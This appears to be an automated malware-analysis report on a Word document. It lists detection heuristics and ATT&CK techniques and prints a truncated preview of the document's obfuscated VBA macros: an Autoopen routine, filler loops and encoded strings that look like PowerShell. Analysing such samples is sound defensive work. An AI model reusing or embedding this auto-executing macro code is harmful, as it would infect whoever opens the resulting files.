MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a Microsoft Office document containing a critical heuristic firing for a Shell() call within VBA macros. The AutoOpen macro is present, indicating it executes automatically upon opening. While the VBA code is heavily obfuscated, the presence of the Shell() call strongly suggests an intent to execute arbitrary commands, likely to download and run a second-stage payload. No specific family could be identified due to the obfuscation.
Heuristics (5)
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 187280 bytes |

SHA-256: 009c17f2690e79b829fc30d795ea06b5fd9c12eafa0337666e627d870802aed1

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "GRRvLCFN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub XjjdbV(FQIZIt)
For wKbMF = 42537 To 10028
For iiAja = 5970 To LrauC
iSCdqf = ChrB(YSFoK)
Next
YnzvMu = 40392 * 20810
wcsvr = ERzNra + sZiPq
Next
End Sub
Sub oMdMY(ijMvNA)
For ijUZlu = 76612 To 37161
For AFaTO = 17387 To aMzDRW
VQULMw = ChrB(VmNKwi)
Next
AzVDk = 38581 * 22986
lEVVo = jQzPHr + IRjbVb
Next
For TNJSaX = 50695 To 29566
For AjCdwi = 29555 To rJGmVQ
prZrjl = ChrB(PshDYv)
Next
vQLTo = 93613 * 68145
NAdBt = LVrzzP + jwijpY
Next
For KwuGU = 72495 To 92194
For uShTKk = 58065 To NirrD
pFbfa = ChrB(SckwY)
Next
uRFXh = 15851 * 77152
bYQiE = EZVEzj + oGofo
Next
End Sub
Sub jaRii(spNTpw)
For DlvQpz = 51975 To 66166
For sHfAr = 9833 To KQssz
sJqhi = ChrB(CrGfI)
Next
ccspz = 65310 * 26027
chKCiD = jCCzDm + tlaIOO
Next
For PmcXmO = 55933 To 26063
For RKfVb = 20006 To ozfYTp
iEbdj = ChrB(PrTww)
Next
vhivo = 19638 * 42018
kmYRYi = lIipMZ + tTKluG
Next
End Sub
Sub Autoopen()
On Error Resume Next
For aqjYN = 28210 To 34064
For DqOzI = 37536 To fKEAVd
kIknOo = ChrB(kDQPa)
Next
vrsLT = 38466 * 51941
sbPRO = nAjtkc + GXoZAd
Next
LDsnjtzzMnH (TmwhhI + fTiLFLOrV + nRtjB)
For dshUW = 99628 To 80872
For kXWfw = 35907 To UElTqb
GchjFz = ChrB(imNiZO)
Next
pTDAn = 55394 * 67586
cBjqK = NINLb + mFnmus
Next
End Sub
Sub BkJzY(biliS)
For wCqAf = 1224 To 28691
For jVdAWw = 42955 To kjQGvG
iSEKlj = ChrB(cauIcp)
Next
FHlfFq = 60768 * 13421
aaiAu = RMHsU + hbqcD
Next
For tDFOVj = 61653 To 59119
For fapPC = 44720 To ijDjv
IiBkU = ChrB(XjvCCA)
Next
DDMFBU = 29948 * 60936
lSdSpX = GYUvWu + NkLzG
Next
For jXnPQU = 10874 To 34302
For CPfrWw = 67309 To CtAip
iEPIhz = ChrB(pWImC)
Next
iNCVS = 60396 * 54756
EPiYZ = iJDGKu + FKALYS
Next
End Sub
Sub NsWEU(EsAYiD)
For Hdokk = 14442 To 40070
For jTCcHT = 49277 To BJtMT
MtZDq = ChrB(lIfYG)
Next
mbWPbQ = 96099 * 36101
ZUcMPi = zOoqtw + vLjRu
Next
End Sub
Attribute VB_Name = "XndVZjz"
Sub licOAc(Yzravv)
For QjPoo = 20688 To 51822
For vzDNJ = 72049 To GmijJN
LctWdW = ChrB(oqzKN)
Next
tGlsn = 11342 * 63087
cLnSBi = FrOmwk + nvSjE
Next
End Sub
Function fTiLFLOrV()
On Error Resume Next
For GJDCwO = 93535 To 241
For qtDjt = 66713 To GDcoW
wlYRmV = ChrB(qaGBp)
Next
TIkWnl = 82849 * 9159
UjPqp = pOEPU + KSiib
Next
For tbJhvL = 36629 To 59850
For UjwHz = 50439 To DIkjUu
bWUTnL = ChrB(wDwrGN)
Next
csqVA = 41412 * 50521
YFbdwR = VKFzo + LbsfTf
Next
GoEOXHE = iFtPF("B1zLOUtY+UtYbo-WAUtY+UtYq+WAqwWAq+WAqenWA'+'q(.0Gc", 1420 + 4 - 1420, 1420 + 42 - 1420)
For jzQtN = 66659 To 51954
For tKTYM = 68680 To OrJOVh
nlHZZR = ChrB(wqhpE)
Next
YoiQO = 81932 * 511
zmabzN = AVFKo + MfmoIJ
Next
For RRFtX = 336 To 16202
For mdqmY = 54719 To hjpnZ
ZWiLJ = ChrB(bRRjPK)
Next
ncsFnD = 70936 * 78304
mXdWVZ = bKBGms + bhNShE
Next
iiLsHiR = iFtPF("Tw0B 63]rahc[,UtYC4dUtY ECaLperc- 43]rahc[,UtYnFOUtYeCalpEr-)UtY}}{hUt'+'Y+Ut'+'YctUtY+UtYaUtY+UtYc}UtY+UtY;ka'+'UtY+UtYerb;)UtY+UtYCDSC4'+'UtY+UtYd()WUtY+UtYAqmetUtY+UtYI-eWhJd", 97858 + 4 - 97858, 97858 + 171 - 97858)
For zabto = 57478 To 78768
For Bkoazk = 14081 To mNBYpV
EsviR = ChrB(ZlDkG)
Next
wCdjvE = 2111 * 17239
SLuKU = aFfjfc + XBtvX
Next
For wHnDi = 15028 To 97989
For jwTsH
... (truncated)